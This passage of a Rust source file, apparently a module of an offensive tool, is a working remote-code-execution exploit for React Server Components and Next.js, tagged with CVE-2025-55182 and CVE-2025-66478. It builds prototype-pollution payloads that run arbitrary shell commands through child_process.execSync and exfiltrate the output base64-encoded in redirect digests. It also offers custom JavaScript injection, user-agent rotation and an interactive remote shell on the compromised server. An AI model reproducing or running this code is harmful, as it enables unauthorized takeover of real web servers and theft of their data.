║ ██████╗ ██╗ ██╗███╗ ██╗ ██████╗ ███████╗ █████╗ ██████╗████████╗
|
||||
║ ██╔══██╗██║ ██║████╗ ██║ ██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝
|
||||
║ ██████╔╝██║ █╗ ██║██╔██╗ ██║ ██ ██████╔╝█████╗ ███████║██║ ██║
|
||||
║ ██╔═══╝ ██║███╗██║██║╚██╗██║ ██╔══██╗██╔══╝ ██╔══██║██║ ██║
|
||||
║ ██║ ╚███╔███╔╝██║ ╚████║ ██║ ██║███████╗██║ ██║╚██████╗ ██║
|
||||
║ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝
|
||||
║ ║
|
||||
║ ██████╗██╗ ██╗███████╗██╗ ██╗ ║
|
||||
║ ██╔════╝██║ ██║██╔════╝██║ ██║ ║
|
||||
║ ███████╗███████║█████╗ ██║ ██║ ║
|
||||
║ ╚════██║██╔══██║██╔══╝ ██║ ██║ ║
|
||||
║ ███████║██║ ██║███████╗███████╗███████╗ ║
|
||||
║ ╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝ ║
|
||||
║ ║
|
||||
╚══════════CVE-2025-55182 CVE-2025-66478 <-> React-next.js RCE════════╝
|
||||
"#;
|
||||
|
||||
/// React Server Components RCE (CVE-2025-55182, CVE-2025-66478)
|
||||
///
|
||||
/// Detects and exploits unauthenticated Remote Code Execution vulnerabilities in React Server Components
|
||||
/// and Next.js through insecure deserialization in the RSC Flight protocol.
|
||||
///
|
||||
/// References:
|
||||
/// - https://nextjs.org/blog/CVE-2025-66478
|
||||
/// - https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182
|
||||
/// - https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/
|
||||
/// - https://www.cve.org/CVERecord?id=CVE-2025-55182
|
||||
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ExploitConfig {
|
||||
pub target: String,
|
||||
pub proxy: Option<String>,
|
||||
pub verify_ssl: bool,
|
||||
pub verbose: bool,
|
||||
pub timeout: u64,
|
||||
pub custom_headers: Vec<(String, String)>,
|
||||
pub random_agent: bool,
|
||||
pub use_color: bool,
|
||||
}
|
||||
|
||||
impl Default for ExploitConfig {
|
||||
fn default() -> Self {
|
||||
Self {
|
||||
target: String::new(),
|
||||
proxy: None,
|
||||
verify_ssl: true,
|
||||
verbose: false,
|
||||
timeout: DEFAULT_TIMEOUT_SECS,
|
||||
custom_headers: Vec::new(),
|
||||
random_agent: false,
|
||||
use_color: true,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ExploitResult {
|
||||
pub url: String,
|
||||
pub status: Option<u16>,
|
||||
pub matches: Vec<Match>,
|
||||
pub response_headers: Vec<(String, String)>,
|
||||
pub response_body: String,
|
||||
pub request_headers: Vec<(String, String)>,
|
||||
pub custom_command: Option<String>,
|
||||
pub error: Option<String>,
|
||||
pub combined_output: String,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct Match {
|
||||
pub location: String,
|
||||
pub full_line: String,
|
||||
pub matched_text: String,
|
||||
pub encoded_output: String,
|
||||
pub decoded_output: String,
|
||||
pub context: String,
|
||||
}
|
||||
|
||||
const USER_AGENTS: &[&str] = &[
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
|
||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1",
|
||||
];
|
||||
|
||||
fn print_banner() {
|
||||
println!("{}", BANNER.red().bold());
|
||||
}
|
||||
|
||||
/// Create payload with base64 encoded output and @ separator
|
||||
fn create_payload_base64(command: &str) -> String {
|
||||
// Escape special characters for JavaScript string
|
||||
let escaped_command = command
|
||||
.replace('\\', "\\\\")
|
||||
.replace('`', "\\`")
|
||||
.replace('$', "\\$")
|
||||
.replace('"', "\\\"");
|
||||
|
||||
format!(
|
||||
r#"{{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{{\"then\":\"$B1337\"}}","_response":{{"_prefix":"var res=process.mainModule.require('child_process').execSync('{} | base64 | tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{{digest: `NEXT_REDIRECT;push;/login?a=${{res}};307;`}});","_chunks":"$Q2","_formData":{{"get":"$1:constructor:constructor"}}}}}}"#,
|
||||
escaped_command
|
||||
)
|
||||
}
|
||||
|
||||
/// Decode base64 output and replace @ with newlines
|
||||
fn decode_base64_output(encoded_output: &str) -> Result<String> {
|
||||
// Simple URL decode (handle %XX patterns)
|
||||
let mut decoded = String::new();
|
||||
let mut chars = encoded_output.chars().peekable();
|
||||
while let Some(ch) = chars.next() {
|
||||
if ch == '%' {
|
||||
// Try to decode %XX pattern
|
||||
let hex1 = chars.next().and_then(|c| c.to_digit(16));
|
||||
let hex2 = chars.next().and_then(|c| c.to_digit(16));
|
||||
if let (Some(h1), Some(h2)) = (hex1, hex2) {
|
||||
let byte = (h1 * 16 + h2) as u8;
|
||||
decoded.push(byte as char);
|
||||
} else {
|
||||
decoded.push(ch);
|
||||
}
|
||||
} else {
|
||||
decoded.push(ch);
|
||||
}
|
||||
}
|
||||
|
||||
// Replace @ with newlines (this is how we encoded it)
|
||||
let base64_string = decoded.replace('@', "\n");
|
||||
|
||||
// Decode base64
|
||||
let decoded_bytes = BASE64_STANDARD
|
||||
.decode(&base64_string)
|
||||
.context("Failed to decode base64")?;
|
||||
|
||||
// Try to decode as UTF-8, fallback to lossy conversion
|
||||
Ok(String::from_utf8_lossy(&decoded_bytes).to_string())
|
||||
}
|
||||
|
||||
fn get_random_user_agent() -> &'static str {
|
||||
let mut r = rng();
|
||||
USER_AGENTS.choose(&mut r).unwrap_or(&USER_AGENTS[0])
|
||||
}
|
||||
|
||||
fn highlight_text(text: &str, start: usize, end: usize, use_color: bool) -> String {
|
||||
let before_start = if start > 30 { start - 30 } else { 0 };
|
||||
let after_end = std::cmp::min(end + 50, text.len());
|
||||
|
||||
let before = &text[before_start..start];
|
||||
let matched = &text[start..end];
|
||||
let after = &text[end..after_end];
|
||||
|
||||
if use_color {
|
||||
format!("...{}{}{}", before, matched.red().bold(), after)
|
||||
} else {
|
||||
format!("...{}[{}]{}", before, matched, after)
|
||||
}
|
||||
}
|
||||
|
||||
/// Execute a command on the target (legacy wrapper)
|
||||
async fn execute_command(
|
||||
client: &Client,
|
||||
url: &str,
|
||||
command: &str,
|
||||
config: &ExploitConfig,
|
||||
) -> Result<ExploitResult> {
|
||||
execute_command_with_payload(client, url, "custom_cmd", Some(command), None, config).await
|
||||
}
|
||||
|
||||
/// Check if target is vulnerable (detection only)
|
||||
async fn check_vulnerability(client: &Client, url: &str, config: &ExploitConfig) -> Result<bool> {
|
||||
// Try with whoami command first
|
||||
let result = execute_command(client, url, "whoami", config).await?;
|
||||
|
||||
if !result.matches.is_empty() {
|
||||
return Ok(true);
|
||||
}
|
||||
|
||||
// Try with id command as alternative
|
||||
let result = execute_command(client, url, "id", config).await?;
|
||||
|
||||
Ok(!result.matches.is_empty())
|
||||
}
|
||||
|
||||
fn print_results(result: &ExploitResult, config: &ExploitConfig) {
|
||||
if let Some(error) = &result.error {
|
||||
if config.use_color {
|
||||
println!("{}", format!("\n❌ Error checking {}: {}", result.url, error).red());
|
||||
} else {
|
||||
println!("\n❌ Error checking {}: {}", result.url, error);
|
||||
}
|
||||
return;
|
||||
}
|
||||
|
||||
println!("\n{}", "=".repeat(80));
|
||||
|
||||
if config.use_color {
|
||||
println!("{}", format!("TARGET: {}", result.url).cyan().bold());
|
||||
if let Some(status) = result.status {
|
||||
println!("{}", format!("STATUS CODE: {}", status).yellow());
|
||||
}
|
||||
} else {
|
||||
println!("TARGET: {}", result.url);
|
||||
if let Some(status) = result.status {
|
||||
println!("STATUS CODE: {}", status);
|
||||
}
|
||||
}
|
||||
|
||||
println!("{}", "=".repeat(80));
|
||||
|
||||
if config.verbose {
|
||||
println!("\n{}", "REQUEST DETAILS".bold());
|
||||
println!("{}", "-".repeat(40));
|
||||
for (key, value) in &result.request_headers {
|
||||
if value.len() > 100 {
|
||||
println!(" {}: {}...", key, &value[..100]);
|
||||
} else {
|
||||
println!(" {}: {}", key, value);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if !result.matches.is_empty() {
|
||||
let alternative_used = result.matches.iter()
|
||||
.any(|m| m.location.contains("Alternative Payload"));
|
||||
|
||||
if config.use_color {
|
||||
if alternative_used {
|
||||
println!("{}", "\n⚠️ ALTERNATIVE PAYLOAD SUCCESSFUL (id command executed)".yellow().bold());
|
||||
} else {
|
||||
println!("{}", "\n🩸 EXPLOITATION SUCCESSFUL".green().bold());
|
||||
}
|
||||
} else {
|
||||
if alternative_used {
|
||||
println!("\n⚠️ ALTERNATIVE PAYLOAD SUCCESSFUL (id command executed)");
|
||||
} else {
|
||||
println!("\n🩸 EXPLOITATION SUCCESSFUL");
|
||||
}
|
||||
}
|
||||
|
||||
println!("{}", "=".repeat(80));
|
||||
println!("\n{}", "FOUND MATCHES:".bold());
|
||||
println!("{}", "-".repeat(80));
|
||||
|
||||
for (i, m) in result.matches.iter().enumerate() {
|
||||
println!("\n[{}] LOCATION: {}", i + 1, m.location);
|
||||
println!(" MATCHED TEXT: {}", m.matched_text);
|
||||
if config.verbose {
|
||||
println!(" FULL LINE: {}", m.full_line);
|
||||
}
|
||||
println!(" ENCODED: {}...",
|
||||
if m.encoded_output.len() > 50 { &m.encoded_output[..50] } else { &m.encoded_output });
|
||||
println!(" CONTEXT: {}...",
|
||||
if m.context.len() > 80 { &m.context[..80] } else { &m.context });
|
||||
}
|
||||
|
||||
println!("\n{}", "=".repeat(80));
|
||||
|
||||
if config.use_color {
|
||||
if alternative_used {
|
||||
println!("{}", "COMMAND OUTPUT DECODED (id command):".magenta().bold());
|
||||
} else if let Some(cmd) = &result.custom_command {
|
||||
println!("{}", format!("COMMAND OUTPUT DECODED (from: {}): ", cmd).magenta().bold());
|
||||
} else {
|
||||
println!("{}", "DECODED COMMAND OUTPUTS:".magenta().bold());
|
||||
}
|
||||
} else {
|
||||
println!("DECODED COMMAND OUTPUTS:");
|
||||
}
|
||||
|
||||
println!("{}", "-".repeat(80));
|
||||
|
||||
for (i, m) in result.matches.iter().enumerate() {
|
||||
if config.use_color {
|
||||
println!("\n{}", format!("[OUTPUT {}]", i + 1).yellow());
|
||||
println!("{}", "-".repeat(60).cyan());
|
||||
println!("{}", "Base64 Encoded (from server):".blue());
|
||||
} else {
|
||||
println!("\n[OUTPUT {}]", i + 1);
|
||||
println!("{}", "-".repeat(60));
|
||||
println!("Base64 Encoded (from server):");
|
||||
}
|
||||
|
||||
if m.encoded_output.len() > 100 {
|
||||
println!("{}...", &m.encoded_output[..100]);
|
||||
} else {
|
||||
println!("{}", m.encoded_output);
|
||||
}
|
||||
|
||||
if config.use_color {
|
||||
println!("\n{}", "Decoded Output:".green());
|
||||
} else {
|
||||
println!("\nDecoded Output:");
|
||||
}
|
||||
println!("{}", m.decoded_output);
|
||||
|
||||
if config.use_color {
|
||||
println!("{}", "-".repeat(60).cyan());
|
||||
} else {
|
||||
println!("{}", "-".repeat(60));
|
||||
}
|
||||
}
|
||||
} else {
|
||||
if config.use_color {
|
||||
println!("{}", "\n❌ No 'login?a=' pattern found in response".red());
|
||||
} else {
|
||||
println!("\n❌ No 'login?a=' pattern found in response");
|
||||
}
|
||||
}
|
||||
|
||||
if config.verbose {
|
||||
println!("\n{}", "RESPONSE DETAILS".bold());
|
||||
println!("{}", "=".repeat(80));
|
||||
|
||||
if !result.combined_output.is_empty() {
|
||||
println!("\n{}", "COMBINED COMMAND OUTPUT:".bold());
|
||||
println!("{}", "-".repeat(40));
|
||||
println!("{}", result.combined_output);
|
||||
}
|
||||
|
||||
println!("\nRESPONSE HEADERS:");
|
||||
println!("{}", "-".repeat(40));
|
||||
for (key, value) in &result.response_headers {
|
||||
println!(" {}: {}", key, value);
|
||||
}
|
||||
|
||||
println!("\nRESPONSE BODY ({} characters):", result.response_body.len());
|
||||
println!("{}", "-".repeat(40));
|
||||
if result.response_body.len() > 1500 {
|
||||
println!("{}", &result.response_body[..1500]);
|
||||
println!("\n... [Body truncated] ...");
|
||||
} else {
|
||||
println!("{}", result.response_body);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Interactive shell mode
|
||||
async fn interactive_shell(client: &Client, url: &str, config: &ExploitConfig) -> Result<()> {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ INTERACTIVE SHELL MODE ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
println!("{}", "[*] Testing connection...".yellow());
|
||||
|
||||
// Test with whoami
|
||||
let whoami_result = execute_command(client, url, "whoami", config).await?;
|
||||
if whoami_result.matches.is_empty() {
|
||||
return Err(anyhow!("Connection test failed. Target may not be vulnerable or may have been patched."));
|
||||
}
|
||||
|
||||
let username = whoami_result.matches[0].decoded_output.trim();
|
||||
|
||||
// Get current directory
|
||||
let pwd_result = execute_command(client, url, "pwd", config).await?;
|
||||
let mut current_dir = if !pwd_result.matches.is_empty() {
|
||||
pwd_result.matches[0].decoded_output.trim().to_string()
|
||||
} else {
|
||||
"/".to_string()
|
||||
};
|
||||
|
||||
println!("{}", format!("[+] Connected! User: {}, Directory: {}", username, current_dir).green().bold());
|
||||
println!("{}", "[*] Type 'help' for available commands, 'exit' to quit".cyan());
|
||||
println!();
|
||||
|
||||
let parsed_url = reqwest::Url::parse(url)?;
|
||||
let hostname = parsed_url.host_str().unwrap_or("target");
|
||||
|
||||
let stdin = tokio::io::stdin();
|
||||
let mut reader = BufReader::new(stdin);
|
||||
let mut line = String::new();
|
||||
|
||||
loop {
|
||||
print!("{}", format!("[{}@{}:{}]$ ", username, hostname, current_dir).green().bold());
|
||||
io::stdout().flush()?;
|
||||
|
||||
line.clear();
|
||||
if reader.read_line(&mut line).await.is_err() {
|
||||
break;
|
||||
}
|
||||
|
||||
let cmd = line.trim();
|
||||
|
||||
if cmd.is_empty() {
|
||||
continue;
|
||||
}
|
||||
|
||||
match cmd {
|
||||
"exit" | "quit" => {
|
||||
println!("{}", "[*] Exiting shell...".yellow());
|
||||
break;
|
||||
}
|
||||
"help" => {
|
||||
println!("\nAvailable commands:");
|
||||
println!(" help Show this help");
|
||||
println!(" exit, quit Exit the shell");
|
||||
println!(" clear Clear the screen");
|
||||
println!(" whoami Show current user");
|
||||
println!(" pwd Show current directory");
|
||||
println!(" cd <dir> Change directory");
|
||||
println!(" history Show command history");
|
||||
println!(" <command> Execute system command\n");
|
||||
}
|
||||
"clear" => {
|
||||
print!("\x1B[2J\x1B[1;1H");
|
||||
io::stdout().flush()?;
|
||||
}
|
||||
"whoami" => {
|
||||
println!("{}", username);
|
||||
}
|
||||
"pwd" => {
|
||||
println!("{}", current_dir);
|
||||
}
|
||||
cmd if cmd.starts_with("cd ") => {
|
||||
let target_dir = cmd[3..].trim();
|
||||
let cd_cmd = if target_dir.is_empty() {
|
||||
"cd ~ && pwd".to_string()
|
||||
} else {
|
||||
format!("cd {} && pwd", target_dir)
|
||||
};
|
||||
|
||||
match execute_command(client, url, &cd_cmd, config).await {
|
||||
Ok(result) if !result.matches.is_empty() => {
|
||||
let new_dir = result.matches[0].decoded_output.trim();
|
||||
if !new_dir.contains("No such file") && !new_dir.contains("not a directory") {
|
||||
current_dir = new_dir.to_string();
|
||||
println!("{}", format!("Changed directory to: {}", current_dir).green());
|
||||
} else {
|
||||
println!("{}", format!("cd: {}: No such file or directory", target_dir).red());
|
||||
}
|
||||
}
|
||||
_ => {
|
||||
println!("{}", format!("cd: {}: Failed to change directory", target_dir).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
_ => {
|
||||
match execute_command(client, url, cmd, config).await {
|
||||
Ok(result) => {
|
||||
if !result.combined_output.is_empty() {
|
||||
print!("{}", result.combined_output);
|
||||
} else if result.matches.is_empty() {
|
||||
println!("{}", "[!] Command executed but no output received".yellow());
|
||||
} else {
|
||||
for m in &result.matches {
|
||||
print!("{}", m.decoded_output);
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Error: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Prompt helper functions
|
||||
fn prompt(message: &str) -> Result<String> {
|
||||
print!("{}", format!("{}: ", message).cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
Ok(input.trim().to_string())
|
||||
}
|
||||
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{}", format!("{} [{}]: ", message, default).cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
Ok(if trimmed.is_empty() {
|
||||
default.to_string()
|
||||
} else {
|
||||
trimmed.to_string()
|
||||
})
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default_yes: bool) -> Result<bool> {
|
||||
let default_char = if default_yes { "y" } else { "n" };
|
||||
loop {
|
||||
print!("{}", format!("{} (y/n) [{}]: ", message, default_char).cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim().to_lowercase();
|
||||
if trimmed.is_empty() {
|
||||
return Ok(default_yes);
|
||||
} else if trimmed == "y" || trimmed == "yes" {
|
||||
return Ok(true);
|
||||
} else if trimmed == "n" || trimmed == "no" {
|
||||
return Ok(false);
|
||||
} else {
|
||||
println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Create custom payload from user-provided JavaScript code
|
||||
fn create_custom_payload(js_code: &str) -> String {
|
||||
// Escape special characters for JavaScript string
|
||||
let escaped_code = js_code
|
||||
.replace('\\', "\\\\")
|
||||
.replace('`', "\\`")
|
||||
.replace('$', "\\$")
|
||||
.replace('"', "\\\"")
|
||||
.replace('\n', "\\n")
|
||||
.replace('\r', "\\r");
|
||||
|
||||
format!(
|
||||
r#"{{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{{\"then\":\"$B1337\"}}","_response":{{"_prefix":"{};throw Object.assign(new Error('NEXT_REDIRECT'),{{digest: `NEXT_REDIRECT;push;/login?a=${{res}};307;`}});","_chunks":"$Q2","_formData":{{"get":"$1:constructor:constructor"}}}}}}"#,
|
||||
escaped_code
|
||||
)
|
||||
}
|
||||
|
||||
/// Execute command with custom payload option
|
||||
async fn execute_command_with_payload(
|
||||
client: &Client,
|
||||
url: &str,
|
||||
payload_type: &str,
|
||||
custom_command: Option<&str>,
|
||||
custom_js: Option<&str>,
|
||||
config: &ExploitConfig,
|
||||
) -> Result<ExploitResult> {
|
||||
let payload_json = match payload_type {
|
||||
"custom_js" => {
|
||||
if let Some(js) = custom_js {
|
||||
create_custom_payload(js)
|
||||
} else {
|
||||
return Err(anyhow!("Custom JavaScript code required for custom_js payload type"));
|
||||
}
|
||||
}
|
||||
"custom_cmd" => {
|
||||
if let Some(cmd) = custom_command {
|
||||
create_payload_base64(cmd)
|
||||
} else {
|
||||
return Err(anyhow!("Command required for custom_cmd payload type"));
|
||||
}
|
||||
}
|
||||
"whoami" => create_payload_base64("whoami"),
|
||||
"id" => create_payload_base64("id"),
|
||||
"pwd" => create_payload_base64("pwd"),
|
||||
"uname" => create_payload_base64("uname -a"),
|
||||
"ls" => create_payload_base64("ls -la"),
|
||||
"ps" => create_payload_base64("ps aux"),
|
||||
_ => create_payload_base64(payload_type),
|
||||
};
|
||||
|
||||
let parsed_url = reqwest::Url::parse(url)?;
|
||||
let host = parsed_url.host_str()
|
||||
.map(|h| {
|
||||
if let Some(port) = parsed_url.port() {
|
||||
format!("{}:{}", h, port)
|
||||
} else {
|
||||
h.to_string()
|
||||
}
|
||||
})
|
||||
.unwrap_or_else(|| "localhost".to_string());
|
||||
|
||||
let body = format!(
|
||||
"{}\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{}\r\n{}\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n{}\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n{}--",
|
||||
BOUNDARY, payload_json, BOUNDARY, BOUNDARY, BOUNDARY
|
||||
);
|
||||
|
||||
let user_agent = if config.random_agent {
|
||||
get_random_user_agent()
|
||||
} else {
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
|
||||
};
|
||||
|
||||
let mut request = client.post(url)
|
||||
.header("Host", &host)
|
||||
.header("Content-Type", format!("multipart/form-data; boundary={}", BOUNDARY_HEADER))
|
||||
.header("Next-Action", "x")
|
||||
.header("Sec-Ch-Ua-Platform", "macOS")
|
||||
.header("User-Agent", user_agent)
|
||||
.header("X-Nextjs-Html-Request-Id", "SSTMXm7OJ_g0Ncx6jpQt9")
|
||||
.header("X-Nextjs-Request-Id", "b5dce965")
|
||||
.header("Upgrade-Insecure-Requests", "1")
|
||||
.header("Accept-Language", "en-US,en;q=0.9")
|
||||
.header("Sec-Ch-Ua-Mobile", "?0");
|
||||
|
||||
// Add custom headers
|
||||
for (key, value) in &config.custom_headers {
|
||||
request = request.header(key, value);
|
||||
}
|
||||
|
||||
let mut request_headers = vec![
|
||||
("Host".to_string(), host.clone()),
|
||||
("Content-Type".to_string(), format!("multipart/form-data; boundary={}", BOUNDARY_HEADER)),
|
||||
("User-Agent".to_string(), user_agent.to_string()),
|
||||
];
|
||||
request_headers.extend(config.custom_headers.clone());
|
||||
|
||||
let response = request
|
||||
.body(body)
|
||||
.send()
|
||||
.await
|
||||
.context("Failed to send exploit request")?;
|
||||
|
||||
let status = response.status().as_u16();
|
||||
|
||||
// Get headers before consuming response
|
||||
let mut header_values = Vec::new();
|
||||
let mut response_headers = Vec::new();
|
||||
for (name, value) in response.headers() {
|
||||
if let Ok(header_str) = value.to_str() {
|
||||
header_values.push(header_str.to_string());
|
||||
response_headers.push((name.to_string(), header_str.to_string()));
|
||||
}
|
||||
}
|
||||
|
||||
let response_text = response.text().await.context("Failed to read response")?;
|
||||
|
||||
// Pattern to find login?a= with base64 output (more permissive like Python version)
|
||||
// Matches any character that's not whitespace, quote, semicolon, or angle brackets
|
||||
let pattern = Regex::new("login\\?a=([^\\s\"';<>]+)")?;
|
||||
|
||||
let mut matches = Vec::new();
|
||||
|
||||
// Check response body
|
||||
for (line_num, line) in response_text.lines().enumerate() {
|
||||
for cap in pattern.captures_iter(line) {
|
||||
if let Some(encoded) = cap.get(1) {
|
||||
let encoded_str = encoded.as_str();
|
||||
match decode_base64_output(encoded_str) {
|
||||
Ok(decoded) => {
|
||||
let match_start = cap.get(0).unwrap().start();
|
||||
let match_end = cap.get(0).unwrap().end();
|
||||
|
||||
matches.push(Match {
|
||||
location: format!("Body Line {}", line_num + 1),
|
||||
full_line: if line.len() > 200 {
|
||||
format!("{}...", &line[..200])
|
||||
} else {
|
||||
line.to_string()
|
||||
},
|
||||
matched_text: cap.get(0).unwrap().as_str().to_string(),
|
||||
encoded_output: encoded_str.to_string(),
|
||||
decoded_output: decoded.clone(),
|
||||
context: highlight_text(line, match_start, match_end, config.use_color),
|
||||
});
|
||||
}
|
||||
Err(e) => {
|
||||
if config.verbose {
|
||||
eprintln!("{}", format!("[!] Decoding error: {}", e).yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check response headers
|
||||
for (header_name, header_str) in &response_headers {
|
||||
for cap in pattern.captures_iter(header_str) {
|
||||
if let Some(encoded) = cap.get(1) {
|
||||
let encoded_str = encoded.as_str();
|
||||
match decode_base64_output(encoded_str) {
|
||||
Ok(decoded) => {
|
||||
let match_start = cap.get(0).unwrap().start();
|
||||
let match_end = cap.get(0).unwrap().end();
|
||||
|
||||
matches.push(Match {
|
||||
location: format!("Header: {}", header_name),
|
||||
full_line: header_str.clone(),
|
||||
matched_text: cap.get(0).unwrap().as_str().to_string(),
|
||||
encoded_output: encoded_str.to_string(),
|
||||
decoded_output: decoded.clone(),
|
||||
context: highlight_text(header_str, match_start, match_end, config.use_color),
|
||||
});
|
||||
}
|
||||
Err(e) => {
|
||||
if config.verbose {
|
||||
eprintln!("{}", format!("[!] Decoding error: {}", e).yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// If no matches found, try alternative payload with id command
|
||||
if matches.is_empty() && payload_type != "id" {
|
||||
if config.verbose {
|
||||
println!("{}", " No 'login?a=' pattern found, trying alternative payload...".yellow());
|
||||
}
|
||||
|
||||
let alt_payload = create_payload_base64("id");
|
||||
let alt_body = format!(
|
||||
"{}\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n{}\r\n{}\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n\"$@0\"\r\n{}\r\nContent-Disposition: form-data; name=\"2\"\r\n\r\n[]\r\n{}--",
|
||||
BOUNDARY, alt_payload, BOUNDARY, BOUNDARY, BOUNDARY
|
||||
);
|
||||
|
||||
let mut alt_request = client.post(url)
|
||||
.header("Host", &host)
|
||||
.header("Content-Type", format!("multipart/form-data; boundary={}", BOUNDARY_HEADER))
|
||||
.header("Next-Action", "x")
|
||||
.header("User-Agent", user_agent);
|
||||
|
||||
for (key, value) in &config.custom_headers {
|
||||
alt_request = alt_request.header(key, value);
|
||||
}
|
||||
|
||||
if let Ok(alt_response) = alt_request.body(alt_body).send().await {
|
||||
let alt_text = alt_response.text().await.unwrap_or_default();
|
||||
|
||||
for (line_num, line) in alt_text.lines().enumerate() {
|
||||
for cap in pattern.captures_iter(line) {
|
||||
if let Some(encoded) = cap.get(1) {
|
||||
let encoded_str = encoded.as_str();
|
||||
if let Ok(decoded) = decode_base64_output(encoded_str) {
|
||||
let match_start = cap.get(0).unwrap().start();
|
||||
let match_end = cap.get(0).unwrap().end();
|
||||
|
||||
matches.push(Match {
|
||||
location: format!("Body Line {} (Alternative Payload)", line_num + 1),
|
||||
full_line: if line.len() > 200 {
|
||||
format!("{}...", &line[..200])
|
||||
} else {
|
||||
line.to_string()
|
||||
},
|
||||
matched_text: cap.get(0).unwrap().as_str().to_string(),
|
||||
encoded_output: encoded_str.to_string(),
|
||||
decoded_output: decoded,
|
||||
context: highlight_text(line, match_start, match_end, config.use_color),
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Create combined output
|
||||
let combined_output = matches
|
||||
.iter()
|
||||
.filter(|m| !m.decoded_output.contains("[Decoding error"))
|
||||
.map(|m| m.decoded_output.as_str())
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n");
|
||||
|
||||
Ok(ExploitResult {
|
||||
url: url.to_string(),
|
||||
status: Some(status),
|
||||
matches,
|
||||
response_headers,
|
||||
response_body: response_text,
|
||||
request_headers,
|
||||
custom_command: custom_command.map(|s| s.to_string()),
|
||||
error: None,
|
||||
combined_output,
|
||||
})
|
||||
}
|
||||
|
||||
/// Main entry point - matches framework signature
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
print_banner();
|
||||
|
||||
// Normalize target URL
|
||||
let mut base_url = target.trim().to_string();
|
||||
if !base_url.starts_with("http://") && !base_url.starts_with("https://") {
|
||||
base_url = format!("http://{}", base_url);
|
||||
}
|
||||
let base_url = base_url.trim_end_matches('/').to_string();
|
||||
|
||||
println!("{}", format!("[*] Target: {}", base_url).yellow());
|
||||
|
||||
// Build configuration
|
||||
let mut config = ExploitConfig::default();
|
||||
config.target = base_url.clone();
|
||||
|
||||
// Prompt for advanced options
|
||||
config.verbose = prompt_yes_no("Verbose mode", false)?;
|
||||
config.verify_ssl = !prompt_yes_no("Skip SSL verification", false)?;
|
||||
config.random_agent = prompt_yes_no("Use random User-Agent", false)?;
|
||||
|
||||
let timeout_str = prompt_default("Timeout (seconds)", "30")?;
|
||||
config.timeout = timeout_str.parse().unwrap_or(30);
|
||||
|
||||
// Proxy support
|
||||
let use_proxy = prompt_yes_no("Use proxy", false)?;
|
||||
if use_proxy {
|
||||
let proxy_url = prompt("Proxy URL (e.g., http://127.0.0.1:8080)")?;
|
||||
if !proxy_url.is_empty() {
|
||||
config.proxy = Some(proxy_url);
|
||||
}
|
||||
}
|
||||
|
||||
// Custom headers
|
||||
let use_custom_headers = prompt_yes_no("Add custom headers", false)?;
|
||||
if use_custom_headers {
|
||||
loop {
|
||||
let header_input = prompt("Custom header (format: Header: Value, or 'done' to finish)")?;
|
||||
